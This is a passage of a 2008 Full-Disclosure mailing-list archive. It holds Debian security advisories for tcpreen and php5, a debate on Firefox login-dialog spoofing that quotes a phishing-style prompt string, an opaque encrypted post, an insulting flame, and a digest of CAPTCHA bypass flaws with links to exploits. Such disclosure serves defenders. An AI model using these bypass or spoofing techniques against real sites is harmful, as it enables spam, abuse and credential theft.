DNS had it coming and should die in a fire").

Just my $.02 (and with the exchange rates today, that's not a whole lot!),
/mz



From brutealmighty at hushmail.com  Thu Jan  3 12:07:21 2008
From: brutealmighty at hushmail.com (brutealmighty at hushmail.com)
Date: Thu, 03 Jan 2008 13:07:21 +0100
Subject: [Full-disclosure] King Kong plays the banjo
Message-ID: <20080103120722.21D3411803A@mailserver5.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Happy new year!

SHA256:

70fdb783515753bad4c2cd4ccf3ff886299378469c862d710c6b0791698de5c4 -
tgz

8000fd7f9d8bfb23d8a5e97248dec458c74578eafee2ea5b644bfa15e267e5d5 -
rb

c3481cf8015dfc14bdf7be7dfe8d371bff1a44a713f01c63f21f824e22043bb9 -
decrypted

36edaaa545d38764bf7a774f2f4d6f870c42c67d0259f19edbdc1542e995d948 -
message below...

- -----BEGIN PGP MESSAGE-----
Version: GnuPG

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
ywMH
=zG8m
- -----END PGP MESSAGE-----
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.5

wpwEAQECAAYFAkd8z/kACgkQ2ctdqFfOCovHLwP/e86jYphLDS1OSg+M+dn/mASC8tFP
SVKaGbQb/e2qeeQOpA+00rHl0OvwEAfiberP/JQM/iUdxVq8yrYWodnEyl5CdjdRD2Hu
dAKf0+swIywvQTFpZuzJkaW2ncZtpuRPBwg0mkKmHZW1GCC1YRtz9NXojM0P1MZoUwUl
ijb83fs=
=k2SJ
-----END PGP SIGNATURE-----

--
Click to learn how to make millions with hedge funds. 
http://tagline.hushmail.com/fc/Ioyw6h4dPMpQ931M5OAYuWIYLoMK5Shgk8KnnUpdgMsdBLOeIFVkIw/



From avivra at gmail.com  Thu Jan  3 13:34:54 2008
From: avivra at gmail.com (avivra)
Date: Thu, 3 Jan 2008 15:34:54 +0200
Subject: [Full-disclosure] Yet another Dialog Spoofing Vulnerability -
	Firefox Basic Authentication
In-Reply-To: <Pine.LNX.4.64.0801031115480.12557@dione.cc>
References: <001601c84dcf$92085dd0$b6191970$@com>
	<Pine.LNX.4.64.0801031115480.12557@dione.cc>
Message-ID: <8beca820801030534h722d7d51sf749cf24ebc1b50a@mail.gmail.com>

On Jan 3, 2008 12:48 PM, Michal Zalewski <lcamtuf at dione.cc> wrote:

> Note that any person familiar with the dialog is unlikely to be confused
> by this prompt, as a clear indication of the originating site, consistent
> with the design of this dialog, is preserved ("...at
> http://avivraff.com").

Might be, if the domain indication was more clear, and not at the end
of the attacker controlled text.

> As such, I would certainly not go as far as
> recommending "not to provide username and password to web sites which show
> this dialog" - that's an overkill. Just don't trust self-contradictory or
> unusually structured dialogs - you never should.

I think regular users would find it difficult to distinguish between a
normal dialog and an unusually structured dialog.

> Naturally, any person *not* used to seeing this dialog might be eager to
> enter his credentials there, lulled by the tech lingo - but that's a
> general complaint about browser design that is in no way specific to
> Firefox; the same person would be likely to give out his password to:
>
>   prompt("Please enter your password for foocorp.com (certified by Verisign)")'.
>
> ...simply because a systemic failure of browser vendors to provide
> user-friendly security signaling and UI behavior (along the lines of: "as
> far as we're concerned, any person with no understanding of SSL, HTTP, and
> DNS had it coming and should die in a fire").
>

Actually, the prompt is not a good example, as FireFox does show the
originating domain in the title, and IE7 disables prompt by default.
Though, I do agree that there are people out there that will be fooled
by this too.

--Aviv.



From damncon at gmail.com  Thu Jan  3 15:54:22 2008
From: damncon at gmail.com (damncon)
Date: Thu, 3 Jan 2008 12:54:22 -0300
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com>
	<90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
	<67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>
Message-ID: <90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>

Is this your mature and worried response about your personal abilities
? n3td3v can-not-code.

> We talk about things your mom wouldn't approve of and i'm not letting
> you sign up, na na na.

btw im already signed in lulz



From jmm at debian.org  Thu Jan  3 18:50:10 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 19:50:10 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1443-1] New tcpreen packages fix
	denial of service
Message-ID: <20080103185010.GA4402@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1443-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 03, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tcpreen
Vulnerability  : buffer overflows
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-6562

It was discovered that several buffer overflows in tcpreen, a tool for
monitoring a TCP connection may lead to denial of service.

For the stable distribution (etch), this problem has been fixed in
version 1.4.3-0.1etch1.

The old stable distribution (sarge) doesn't contain tcpreen.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.3-0.3.

We recommend that you upgrade your tcpreen package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1.dsc
    Size/MD5 checksum:      579 83c33a7131f3191048aba4b610e292ca
  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3.orig.tar.gz
    Size/MD5 checksum:   232290 5600968d012f8353e4e0797d4c330393
  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1.diff.gz
    Size/MD5 checksum:    26016 b1af9b7571c037713b123f33e5e79721

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_alpha.deb
    Size/MD5 checksum:    44064 5dc26f1233f232305b7c8d2e2e2cb4ac

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_amd64.deb
    Size/MD5 checksum:    42494 5cc27918abcac4a19eb661894005e963

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_arm.deb
    Size/MD5 checksum:    39378 10c0d8bd70154755e372318e39f10266

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_hppa.deb
    Size/MD5 checksum:    43848 7039041a01ddcd25e74cfb6c025d3e6c

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_i386.deb
    Size/MD5 checksum:    40274 bcd58bac3ae59767861a9fee6653e882

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_ia64.deb
    Size/MD5 checksum:    48438 85ac614d61faa5a66d7e14efd5490daf

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_mips.deb
    Size/MD5 checksum:    43610 9fb5942fc0d95e87c2a8e3964c30b8d7

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_mipsel.deb
    Size/MD5 checksum:    43620 e9b81ad8b5e0f05501c264b5efd6ed7f

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_powerpc.deb
    Size/MD5 checksum:    40848 43b0d65c0a8445d7d5880f87a5fbb005

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_s390.deb
    Size/MD5 checksum:    41020 e4d80551b7ffe958f9ad7103b2973087

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/t/tcpreen/tcpreen_1.4.3-0.1etch1_sparc.deb
    Size/MD5 checksum:    39366 e897ed3d4b1d0b85225f88f8a0cc0990


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfS47Xm3vHE4uyloRAvk0AKDjGYiuFnPPlk1wqJFygd0Pb5UPswCggBI4
00sr9i2KsziaShJjvQNPvGs=
=rqc7
-----END PGP SIGNATURE-----



From 3APA3A at SECURITY.NNOV.RU  Thu Jan  3 19:53:27 2008
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 3 Jan 2008 22:53:27 +0300
Subject: [Full-disclosure] multiple CAPTCHA automation test bypass digest
Message-ID: <1842083797.20080103225327@SECURITY.NNOV.RU>

Dear bugtraq,

  Below  is a digest of vulnerabilities in multiple CAPTCHA systems. All
  vulnerabilities  were reported by MustLive (websecurity.com.ua) during
  "The Month of Bugs in CAPTCHA"

1. Peter?s Custom Anti-Spam Image < 2.9 (Wordpress plugin)

   1.1 "antiselect" value can be guessed with 10% probability.
   1.2 Same check pairs may be used for multiple postings

   According  to vendor both problems were addressed in Version 2.9.0 on
   August 11, 2007

   Original article: http://websecurity.com.ua/1501/
   Exploit for 1.2: http://websecurity.com.ua/uploads/2007/MoBiC/Peter's%20Custom%20Anti-Spam%20Image%20CAPTCHA%20bypass.html

2. mt-scode CAPTCHA (plugin for Movable type and Drupal)

   Same check pairs may be used for multiple postings

   Original article: http://websecurity.com.ua/1516/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/mt-scode%20CAPTCHA%20bypass.html

3. PHP-Nuke <= 8.1

   3.1 Same check pairs may be used for multiple postings/registrations

   Original article: http://websecurity.com.ua/1527/
   Exploit:
           http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Nuke%20CAPTCHA%20bypass.html
           (posting)
           http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Nuke%20CAPTCHA%20bypass2.html
           (registration)

   3.2  NULL  string  CAPTCH bypass: if NULL string is given, CAPTCHA is
   not validated.

   Original article: http://websecurity.com.ua/1528/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Nuke%20CAPTCHA%20bypass3.html

4. Peter?s Random Anti-Spam Image <= 0.2.4 (Wordpress plugin)

   CAPTCHA may be bypassed by pre-generating possible image-code pairs.

   Original article: http://websecurity.com.ua/1534/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Peter's%20Random%20Anti-Spam%20Image%20CAPTCHA%20bypass.html

5. Cryptographp <= 1.12 (Wordpress plugin)

   It's possible to reuse same security code during session

   Originale article: http://websecurity.com.ua/1551/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Cryptographp%20CAPTCHA%20bypass.html

6. PHP-Fusion / HBH-Fusion (version not reported) CAPTCHA bypass

   It's possible to reuse same security code during session

   Original article:
            http://websecurity.com.ua/1558/ (PHP-Fusion)
            http://websecurity.com.ua/1561/ (HBH-Fusion)
   Exploit:
            http://websecurity.com.ua/uploads/2007/MoBiC/PHP-Fusion%20CAPTCHA%20bypass.html
            (PHP-Fusion)
            http://websecurity.com.ua/uploads/2007/MoBiC/HBH-Fusion%20CAPTCHA%20bypass.txt
            (HBH-Fusion)
            
7. Nucleus  <= 3.01 CAPTCHA bypass

   7.1 CAPTCHA may be bypassed by pre-generating possible image-code pairs.
   7.2 SQL injection vulnerability can be used to bypass CAPTCHA
   

   Original article:
            (7.1) http://websecurity.com.ua/1564/
            (7.2) http://websecurity.com.ua/1565/
   Exploit:
            (7.1) http://websecurity.com.ua/uploads/2007/MoBiC/Nucleus%20CAPTCHA%20bypass.html
            (7.2) http://websecurity.com.ua/uploads/2007/MoBiC/Nucleus%20CAPTCHA%20bypass2.html

8. Auto-Input Protection (AIP) <= 2.0 (for ASP.Net)

   Same check pairs may be used for multiple postings

   Original article:   http://websecurity.com.ua/1568/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/AIP%20CAPTCHA%20bypass.html
   Vendor's suggested workaround:
   http://davesexton.com/blog/blogs/blog/archive/2007/12/12/aip-1-0-0-bypassed.aspx

9. Math Comment Spam Protection  <= 2.1 (Wordpress plugin)

   Same check pairs may be used for multiple postings

   Original article: http://websecurity.com.ua/1575/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Math%20Comment%20Spam%20Protection%20CAPTCHA%20bypass.html

10. Anti Spam Image <= 0.5 (Wordpress plugin)

   It's possible to reuse same security code during session

   Original article: http://websecurity.com.ua/1584/
   Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/Anti%20Spam%20Image%20CAPTCHA%20bypass.html

11. Captcha! <= 2.5d (Wordpress plugin)

    It's  possible  to  bypass  CAPTCHA  by  combining  crossite request
    forgery vulnerability with NULL string for security code.

    Original article: http://websecurity.com.ua/1587/
    Exploit:
            http://websecurity.com.ua/uploads/2007/MoBiC/Captcha!%20CSRF.html
            (crossite request forgery)
            http://websecurity.com.ua/uploads/2007/MoBiC/Captcha!%20CAPTCHA%20bypass.html
            (CAPTCHA bypass)
    
12. WP-ContactForm <= 2.0.7 (Wordpress plugin)

    Same security code may be used for multiple times

    Original article: http://websecurity.com.ua/1599/
    Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CAPTCHA%20bypass.html

13. Drupal (reCaptcha)

    unique  captcha_token parameter without recaptcha_response_field may
    be used to bypass CAPTCHA.

    Vulnerability  is  reported  in  reCaptcha  plugin  for  Drupal, but
    according to reCaptcha developers, vulnerability is in Drupal code.

    Original article: http://websecurity.com.ua/1505/
    Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt

    
    
   
-- 
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/



From jmm at debian.org  Thu Jan  3 20:25:59 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 21:25:59 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1444-1] New php5 packages fix
	several vulnerabilities
Message-ID: <20080103202559.GA6299@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1444-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 03, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : php5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3799 CVE-2007-3998 CVE-2007-4657 CVE-2007-4658 CVE-2007-4659 CVE-2007-4660 CVE-2007-4662 CVE-2007-5898 CVE-2007-5899

Several remote vulnerabilities have been discovered in PHP, a
server-side, HTML-embedded scripting language. The Common 
Vulnerabilities and Exposures project identifies the following
problems:

CVE-2007-3799

    It was discovered that the session_start() function allowed the
    insertion of attributes into the session cookie.

CVE-2007-3998

    Mattias Bengtsson and Philip Olausson discovered that a
    programming error in the implementation of the wordwrap() function
    allowed denial of service through an infinite loop.

CVE-2007-4658

    Stanislav Malyshev discovered that a format string vulnerability
    in the money_format() function could allow the execution of
    arbitrary code.

CVE-2007-4659

    Stefan Esser discovered that execution control flow inside the
    zend_alter_ini_entry() function in handled incorrectly in case
    of a memory limit violation.

CVE-2007-4660

    Gerhard Wagner discovered an integer overflow inside the
    chunk_split function().

CVE-2007-5898

    Rasmus Lerdorf discovered that incorrect parsing of multibyte
    sequences may lead to disclosure of memory contents.

CVE-2007-5899

    It was discovered that the output_add_rewrite_var() function could
    leak session ID information, resulting in information disclosure.

This update also fixes two bugs from in the PHP 5.2.4 release which
don't have security impact according to the Debian PHP security policy
(CVE-2007-4657 and CVE-2007-4662), but which are fixed nonetheless.


For the stable distribution (etch), these problems have been fixed in
version 5.2.0-8+etch9.

The old stable distribution (sarge) doesn't contain php5.

For the unstable distribution (sid), these problems have been fixed
in version 5.2.4-1, with the exception of CVE-2007-5898 and
CVE-2007-5899, which will be fixed soon. Please note that Debian's
version of PHP is hardened with the Suhosin patch beginning with
version 5.2.4-1, which renders several vulnerabilities ineffective.

We recommend that you upgrade your php5 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch9.dsc
    Size/MD5 checksum:     1976 ea66b7390ce3f297e4066e6ca38cba1f
  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch8.diff.gz
    Size/MD5 checksum:   119710 992446edb0cea8d0c1730147a3451476
  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch9.diff.gz
    Size/MD5 checksum:   121724 92b9cdf6049dd9fd0ddc84954315aeb9
  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch8.dsc
    Size/MD5 checksum:     1976 3578bc42034e155914d2bbe9ac0c4d3c
  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0.orig.tar.gz
    Size/MD5 checksum:  8583491 52d7e8b3d8d7573e75c97340f131f988

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch8_all.deb
    Size/MD5 checksum:     1048 dcb10fc12f5a9032e877f9f75c46997a
  http://security.debian.org/pool/updates/main/p/php5/php5_5.2.0-8+etch9_all.deb
    Size/MD5 checksum:     1042 3599f4d6fc46615165be7c779578b134
  http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.0-8+etch8_all.deb
    Size/MD5 checksum:   311194 70f7219e8b3142daacd063288412cc61
  http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.0-8+etch9_all.deb
    Size/MD5 checksum:   306962 1cf3a18048d7052248baf1f287bb8476

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:   345904 7a16a266f376e71b0203d6c0c4f1202a
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    70900 eb4cc5406257b6048038fb79c78e0301
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:  2482322 a91ab5df21bbf61643f7de6c3fd01ff6
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:  2483108 1ed4fcd316f613281b53dda36064bc60
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:  4933724 bedcffd72c33da5b46ab4fe129b601ef
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:     5318 11f6e745492a23b3cfa03104787bb212
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    13478 81a71eb37709ad35e549875bb5aa4204
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    11844 54fa0bf25af8ca392e36ebe16104f743
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    18614 07dd207abc1482fcc39faea1138349a3
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    18614 e892a25f06fc13076498c9597bc504c5
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    40296 fa4d16c708c706b3550c3bcf2072c1d4
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    36552 f465ec5b0cceb96641190534000ab043
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    17548 0041081d9df6cafcf338d3f4e334dea9
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    36442 463243dd30c0b9547ea6fa1ed51de906
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:  2561364 3b619f14bf6cb9479030bf5700719ea4
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:     9056 52a4d79ef84ddad457a6e9aa861739be
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    38858 deed2e873d5b0693c32f48273cd688fa
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    70710 26da27b5cfd43ccc2b96efa6dc19d86b
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    55664 848156a92d71900c2c0b4085d01c5628
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    17550 1a868640ef2024ab506e0a03beb37164
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:     9058 314ebae7406d3f7cb81bc663bd68632b
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    36094 54eee5ccbbf4d25753f1a1a28ccf38fb
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    13474 526c6ed87c9b5856b335059834ae843f
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    55648 da087fc0134aa967aacc5a9c2594eea3
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:  2560804 b4266e7d84372da5b2e89cde68b23837
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    36546 9006dae656a6f9ef2e8ebfad3f90694d
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:     4946 aec22ba671767f6e40d6b375d20dee31
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:    38500 12286e8f8bafc9c654b97371465625e8
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:  4933000 71bcb0f8e39a8dda69583512d2f08a2c
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    13388 ca0e22943b18950feea8d968705e20af
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:     4946 81982ef358d97c882c47fd21bec31e23
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_alpha.deb
    Size/MD5 checksum:   342100 dcdb5ae400f1a59ce729bc850aa049fc
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_alpha.deb
    Size/MD5 checksum:    36558 1a4c365cabead628bccaaa987b932688
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_alpha.deb
